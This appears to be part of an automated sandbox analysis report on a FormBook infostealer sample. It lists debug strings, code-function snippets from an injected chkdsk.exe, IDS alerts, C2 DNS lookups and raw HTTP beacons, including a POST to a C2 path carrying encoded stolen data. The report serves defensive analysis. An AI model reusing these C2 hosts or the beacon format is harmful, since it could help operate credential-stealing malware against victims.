Source:	Binary string: System.Configuration.pdb source: WER2640.tmp.dmp.9.dr
Source:	Binary string: System.Drawing.ni.pdbRSDS source: WER2640.tmp.dmp.9.dr
Source:	Binary string: System.Xml.pdb source: WER2640.tmp.dmp.9.dr
Source:	Binary string: System.pdb source: WER2640.tmp.dmp.9.dr
Source:	Binary string: System.Xml.ni.pdbRSDS# source: WER2640.tmp.dmp.9.dr
Source:	Binary string: Microsoft.VisualBasic.pdb source: WER2640.tmp.dmp.9.dr
Source:	Binary string: System.Core.ni.pdb source: WER2640.tmp.dmp.9.dr
Source:	Binary string: chkdsk.pdbGCTL source: ilasm.exe, 00000005.00000002.1869476562.0000000005658000.00000004.00000020.00020000.00000000.sdmp, uwZgUlCQSPVT.exe, 0000000A.00000003.1808867290.0000000000BF4000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: System.Windows.Forms.pdb source: WER2640.tmp.dmp.9.dr
Source:	Binary string: System.Drawing.pdb/ source: WER2640.tmp.dmp.9.dr
Source:	Binary string: mscorlib.pdb source: WER2640.tmp.dmp.9.dr
Source:	Binary string: System.Management.ni.pdbRSDSJ< source: WER2640.tmp.dmp.9.dr
Source:	Binary string: System.Windows.Forms.ni.pdbRSDS source: WER2640.tmp.dmp.9.dr
Source:	Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: uwZgUlCQSPVT.exe, 0000000A.00000000.1789081369.00000000009FE000.00000002.00000001.01000000.00000008.sdmp, uwZgUlCQSPVT.exe, 00000010.00000000.1937713826.00000000009FE000.00000002.00000001.01000000.00000008.sdmp
Source:	Binary string: System.Drawing.pdb source: WER2640.tmp.dmp.9.dr
Source:	Binary string: System.Management.pdb source: WER2640.tmp.dmp.9.dr
Source:	Binary string: chkdsk.pdb source: ilasm.exe, 00000005.00000002.1869476562.0000000005658000.00000004.00000020.00020000.00000000.sdmp, uwZgUlCQSPVT.exe, 0000000A.00000003.1808867290.0000000000BF4000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: mscorlib.ni.pdb source: WER2640.tmp.dmp.9.dr
Source:	Binary string: System.Management.ni.pdb source: WER2640.tmp.dmp.9.dr
Source:	Binary string: System.Core.pdb source: WER2640.tmp.dmp.9.dr
Source:	Binary string: System.Configuration.ni.pdbRSDScUN source: WER2640.tmp.dmp.9.dr
Source:	Binary string: System.Configuration.pdbP source: WER2640.tmp.dmp.9.dr
Source:	Binary string: System.ni.pdb source: WER2640.tmp.dmp.9.dr
Source:	Binary string: System.Core.ni.pdbRSDS source: WER2640.tmp.dmp.9.dr

Source: C:\Windows\SysWOW64\chkdsk.exe

Code function: 12_2_0457B5C0 FindFirstFileW,FindNextFileW,FindClose,

12_2_0457B5C0

Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 4x nop then xor eax, eax	12_2_04569320
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 4x nop then pop edi	12_2_0456D8A9
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 4x nop then pop edi	12_2_04571B46
Source: C:\Program Files (x86)\kBvRNZzEDWKxiKRbGtJJcVabtdANvLUGxAUYhMfJpWykgAwcOmSPyGPEzJTsgFntPfPBFGzaU\uwZgUlCQSPVT.exe	Code function: 4x nop then xor eax, eax	16_2_02B5B7E2
Source: C:\Program Files (x86)\kBvRNZzEDWKxiKRbGtJJcVabtdANvLUGxAUYhMfJpWykgAwcOmSPyGPEzJTsgFntPfPBFGzaU\uwZgUlCQSPVT.exe	Code function: 4x nop then pop edi	16_2_02B5670C

Networking

Snort IDS alert for network traffic

Source: Traffic	Snort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.4:49743 -> 162.241.216.140:80
Source: Traffic	Snort IDS: 2856318 ETPRO TROJAN FormBook CnC Checkin (POST) M4 192.168.2.4:49744 -> 57.151.38.169:80
Source: Traffic	Snort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.4:49744 -> 57.151.38.169:80
Source: Traffic	Snort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.4:49745 -> 57.151.38.169:80
Source: Traffic	Snort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.4:49748 -> 57.151.38.169:80
Source: Traffic	Snort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.4:49749 -> 162.241.216.140:80
Source: Traffic	Snort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.4:49750 -> 162.241.216.140:80
Source: Traffic	Snort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.4:49752 -> 162.241.216.140:80
Source: Traffic	Snort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.4:49753 -> 217.160.0.111:80
Source: Traffic	Snort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.4:49754 -> 217.160.0.111:80
Source: Traffic	Snort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.4:49756 -> 217.160.0.111:80
Source: Traffic	Snort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.4:49757 -> 91.195.240.123:80
Source: Traffic	Snort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.4:49758 -> 91.195.240.123:80
Source: Traffic	Snort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.4:49760 -> 91.195.240.123:80
Source: Traffic	Snort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.4:49761 -> 162.0.237.22:80
Source: Traffic	Snort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.4:49762 -> 162.0.237.22:80
Source: Traffic	Snort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.4:49764 -> 162.0.237.22:80
Source: Traffic	Snort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.4:49765 -> 136.143.186.12:80
Source: Traffic	Snort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.4:49766 -> 136.143.186.12:80
Source: Traffic	Snort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.4:49768 -> 136.143.186.12:80
Source: Traffic	Snort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.4:49769 -> 103.168.172.37:80
Source: Traffic	Snort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.4:49770 -> 103.168.172.37:80
Source: Traffic	Snort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.4:49772 -> 103.168.172.37:80
Source: Traffic	Snort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.4:49773 -> 104.37.39.71:80
Source: Traffic	Snort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.4:49774 -> 104.37.39.71:80
Source: Traffic	Snort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.4:49776 -> 104.37.39.71:80
Source: Traffic	Snort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.4:49777 -> 199.59.243.225:80
Source: Traffic	Snort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.4:49778 -> 199.59.243.225:80
Source: Traffic	Snort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.4:49780 -> 199.59.243.225:80
Source: Traffic	Snort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.4:49781 -> 162.241.216.140:80
Source: Traffic	Snort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.4:49782 -> 162.241.216.140:80
Source: Traffic	Snort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.4:49784 -> 162.241.216.140:80
Source: Traffic	Snort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.4:49785 -> 57.151.38.169:80
Source: Traffic	Snort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.4:49786 -> 57.151.38.169:80
Source: Traffic	Snort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.4:49788 -> 57.151.38.169:80
Source: Traffic	Snort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.4:49789 -> 162.241.216.140:80
Source: Traffic	Snort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.4:49790 -> 162.241.216.140:80
Source: Traffic	Snort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.4:49792 -> 162.241.216.140:80
Source: Traffic	Snort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.4:49793 -> 217.160.0.111:80
Source: Traffic	Snort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.4:49794 -> 217.160.0.111:80
Source: Traffic	Snort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.4:49796 -> 217.160.0.111:80

Source: Joe Sandbox View	IP Address: 136.143.186.12 136.143.186.12
Source: Joe Sandbox View	IP Address: 217.160.0.111 217.160.0.111

Source: Joe Sandbox View	ASN Name: AARNET-AS-APAustralianAcademicandResearchNetworkAARNe AARNET-AS-APAustralianAcademicandResearchNetworkAARNe
Source: Joe Sandbox View	ASN Name: ZOHO-ASUS ZOHO-ASUS
Source: Joe Sandbox View	ASN Name: ONECOMDK ONECOMDK
Source: Joe Sandbox View	ASN Name: ONEANDONE-ASBrauerstrasse48DE ONEANDONE-ASBrauerstrasse48DE
Source: Joe Sandbox View	ASN Name: NAMECHEAP-NETUS NAMECHEAP-NETUS

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic	HTTP traffic detected: GET /mcz6/?abN=jpQBXhuFRU/tY42AZC12Q1/B5+IE3XzQLSvL4WMkje8Ac0YXf6PnpjUwWfsjtXOk/4EuhOubIcIRVaFREiblre7wMQ7hpfbmYAEsuIkYCegYwn6boLYQuO8=&HV8hD=_ZnHYJfHNd6deTQP HTTP/1.1Host: www.lenslaser.comAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:36.0) Gecko/20100101 Firefox/36.0
Source: global traffic	HTTP traffic detected: GET /mcz6/?HV8hD=_ZnHYJfHNd6deTQP&abN=iV05GdjlKKe2Focp0rDI6BJmO0Ht/xDmYroAP0qP29Gns/tznWejtp74GMksy59FodZgvEjUcMF+Pj4nBc1ga/G/HMKcAJl8ZLysNQgHdg+oe+l1VwrhC98= HTTP/1.1Host: www.allinone24.shopAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:36.0) Gecko/20100101 Firefox/36.0
Source: global traffic	HTTP traffic detected: GET /mcz6/?abN=jpQBXhuFRU/tY42AZC12Q1/B5+IE3XzQLSvL4WMkje8Ac0YXf6PnpjUwWfsjtXOk/4EuhOubIcIRVaFREiblre7wMQ7hpfbmYAEsuIkYCegYwn6boLYQuO8=&HV8hD=_ZnHYJfHNd6deTQP HTTP/1.1Host: www.lenslaser.comAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:36.0) Gecko/20100101 Firefox/36.0
Source: global traffic	HTTP traffic detected: GET /mcz6/?HV8hD=_ZnHYJfHNd6deTQP&abN=t2ltNu02BWCxFJkMInGc7SUNVmZAlmpo25Fvtgz0OT6/eZJtaFugFEP80bfDefIKNSUaDat+4U4ei33vOp33J3w7E/1DXRKVU7+ltx/Ze5a9KKXUCEtCgjk= HTTP/1.1Host: www.carliente.comAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:36.0) Gecko/20100101 Firefox/36.0
Source: global traffic	HTTP traffic detected: GET /mcz6/?abN=+LASaW8sLlti/Y5p1q0qKU3hQBfGLeZfunbDEh0FE1w8Tz+VHrtWZSUefKogmen1MiEzwZmsfiIE4qB4y6VqrKvXOipPExFwKQmiwKnwFMVTTGbdQXrJvJk=&HV8hD=_ZnHYJfHNd6deTQP HTTP/1.1Host: www.walletweb367.topAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:36.0) Gecko/20100101 Firefox/36.0
Source: global traffic	HTTP traffic detected: GET /mcz6/?HV8hD=_ZnHYJfHNd6deTQP&abN=Z7d5vO3PiPWE/zeJlxtYmOYnF8uMEonypBLuOElxuuV1BOUgEEq9TvThZhsN+4G3m8UtXtkpFAILmOKtc08U8eULhaLH/eruf+vtSehKJ3r2fKzbVPqM3Ks= HTTP/1.1Host: www.deaybrid.infoAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:36.0) Gecko/20100101 Firefox/36.0
Source: global traffic	HTTP traffic detected: GET /mcz6/?HV8hD=_ZnHYJfHNd6deTQP&abN=5d/f0hfwoo/9d3f97tbdjxDk4KU85C4YC37M3UWhy4ALmXvbgMxGv66I6qe5jd4u2tKoxygbv/cknJWC1exftQvP2lviqJawgXV46wbQMN+Gc/xUQSNa8ks= HTTP/1.1Host: www.jrksa.infoAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:36.0) Gecko/20100101 Firefox/36.0
Source: global traffic	HTTP traffic detected: GET /mcz6/?HV8hD=_ZnHYJfHNd6deTQP&abN=WM8YJa5qA0NkIP/fN4mRPH2hsfvjO1kWxn5RlfXsP+w6QT8BWCtnYGsQFWxr+5Q3wXsj3+rXjilTrq1L87WN5VMBaPcH6h4tJWWqH5H+VkhDr+c9eHm1vWk= HTTP/1.1Host: www.celebration24.co.ukAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:36.0) Gecko/20100101 Firefox/36.0
Source: global traffic	HTTP traffic detected: GET /mcz6/?abN=PB65ht3xmDnV1ShWjeHediWpJ6xhKUn+w4dQHmlxp9S6BIZIF1eyIZ9SallNAheKgV6/CipsbblBAwuU+20rDr4rF7jlE8qBiXwygrRuGMbV3F1YqBDOThA=&HV8hD=_ZnHYJfHNd6deTQP HTTP/1.1Host: www.gledingakademiet.noAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:36.0) Gecko/20100101 Firefox/36.0
Source: global traffic	HTTP traffic detected: GET /mcz6/?abN=qn3zkYHztMKe8mzud8vq3qgzcmJ7Jd4FLz3cQj0k4MJfJlhRJYX+G77tvqK2UZX2Wgv5bTm3q1t3YjrK87HOPCWB0khZATxvEtVM+0yJiG12ulMvj5DktkI=&HV8hD=_ZnHYJfHNd6deTQP HTTP/1.1Host: www.zwervertjes.beAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:36.0) Gecko/20100101 Firefox/36.0
Source: global traffic	HTTP traffic detected: GET /mcz6/?abN=jpQBXhuFRU/tY42AZC12Q1/B5+IE3XzQLSvL4WMkje8Ac0YXf6PnpjUwWfsjtXOk/4EuhOubIcIRVaFREiblre7wMQ7hpfbmYAEsuIkYCegYwn6boLYQuO8=&HV8hD=_ZnHYJfHNd6deTQP HTTP/1.1Host: www.lenslaser.comAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:36.0) Gecko/20100101 Firefox/36.0
Source: global traffic	HTTP traffic detected: GET /mcz6/?HV8hD=_ZnHYJfHNd6deTQP&abN=iV05GdjlKKe2Focp0rDI6BJmO0Ht/xDmYroAP0qP29Gns/tznWejtp74GMksy59FodZgvEjUcMF+Pj4nBc1ga/G/HMKcAJl8ZLysNQgHdg+oe+l1VwrhC98= HTTP/1.1Host: www.allinone24.shopAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:36.0) Gecko/20100101 Firefox/36.0
Source: global traffic	HTTP traffic detected: GET /mcz6/?abN=jpQBXhuFRU/tY42AZC12Q1/B5+IE3XzQLSvL4WMkje8Ac0YXf6PnpjUwWfsjtXOk/4EuhOubIcIRVaFREiblre7wMQ7hpfbmYAEsuIkYCegYwn6boLYQuO8=&HV8hD=_ZnHYJfHNd6deTQP HTTP/1.1Host: www.lenslaser.comAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:36.0) Gecko/20100101 Firefox/36.0
Source: global traffic	HTTP traffic detected: GET /mcz6/?HV8hD=_ZnHYJfHNd6deTQP&abN=t2ltNu02BWCxFJkMInGc7SUNVmZAlmpo25Fvtgz0OT6/eZJtaFugFEP80bfDefIKNSUaDat+4U4ei33vOp33J3w7E/1DXRKVU7+ltx/Ze5a9KKXUCEtCgjk= HTTP/1.1Host: www.carliente.comAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:36.0) Gecko/20100101 Firefox/36.0

Source: global traffic	DNS traffic detected: DNS query: www.dty377.com
Source: global traffic	DNS traffic detected: DNS query: www.lenslaser.com
Source: global traffic	DNS traffic detected: DNS query: www.allinone24.shop
Source: global traffic	DNS traffic detected: DNS query: www.carliente.com
Source: global traffic	DNS traffic detected: DNS query: www.walletweb367.top
Source: global traffic	DNS traffic detected: DNS query: www.deaybrid.info
Source: global traffic	DNS traffic detected: DNS query: www.prizesupermarket.com
Source: global traffic	DNS traffic detected: DNS query: www.jrksa.info
Source: global traffic	DNS traffic detected: DNS query: www.cookedatthebottom.com
Source: global traffic	DNS traffic detected: DNS query: www.celebration24.co.uk
Source: global traffic	DNS traffic detected: DNS query: www.gledingakademiet.no
Source: global traffic	DNS traffic detected: DNS query: www.alfaspa.net
Source: global traffic	DNS traffic detected: DNS query: www.zwervertjes.be
Source: global traffic	DNS traffic detected: DNS query: www.maerealtysg.com
Source: global traffic	DNS traffic detected: DNS query: www.polhi.lol

Source: unknown

HTTP traffic detected: POST /mcz6/ HTTP/1.1Host: www.allinone24.shopAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Accept-Encoding: gzip, deflate, brOrigin: http://www.allinone24.shopReferer: http://www.allinone24.shop/mcz6/Connection: closeContent-Length: 200Content-Type: application/x-www-form-urlencodedCache-Control: max-age=0User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:36.0) Gecko/20100101 Firefox/36.0Data Raw: 61 62 4e 3d 76 58 63 5a 46 74 50 68 45 4b 57 4a 53 37 6f 45 71 4a 4c 49 38 54 31 71 51 55 44 50 32 77 37 48 50 36 5a 65 66 69 69 64 77 4c 69 46 6d 75 74 50 73 6b 37 7a 6a 70 2f 42 66 36 39 57 79 63 35 71 2b 4d 6c 37 6d 32 57 48 47 65 39 70 43 52 59 61 4d 2f 6c 72 4e 39 72 74 4f 38 47 56 49 35 4e 69 64 5a 43 5a 4e 41 4a 58 55 31 2b 37 66 65 77 43 5a 6b 72 49 50 4f 43 5a 44 78 33 51 44 62 41 54 6d 66 31 54 50 6f 34 2f 77 69 63 46 7a 48 69 7a 69 69 64 31 4d 65 30 54 51 4e 69 73 54 56 53 58 42 68 72 63 48 62 67 77 66 32 6c 4a 52 31 72 42 47 47 52 7a 31 4e 52 30 55 79 69 5a 66 64 4d 67 66 67 3d 3d Data Ascii: abN=vXcZFtPhEKWJS7oEqJLI8T1qQUDP2w7HP6ZefiidwLiFmutPsk7zjp/Bf69Wyc5q+Ml7m2WHGe9pCRYaM/lrN9rtO8GVI5NidZCZNAJXU1+7fewCZkrIPOCZDx3QDbATmf1TPo4/wicFzHiziid1Me0TQNisTVSXBhrcHbgwf2lJR1rBGGRz1NR0UyiZfdMgfg==

Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 05 Jun 2024 13:05:35 GMTServer: ApacheContent-Length: 315Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 05 Jun 2024 13:06:06 GMTServer: ApacheContent-Length: 315Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 05 Jun 2024 13:06:08 GMTServer: ApacheContent-Length: 315Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
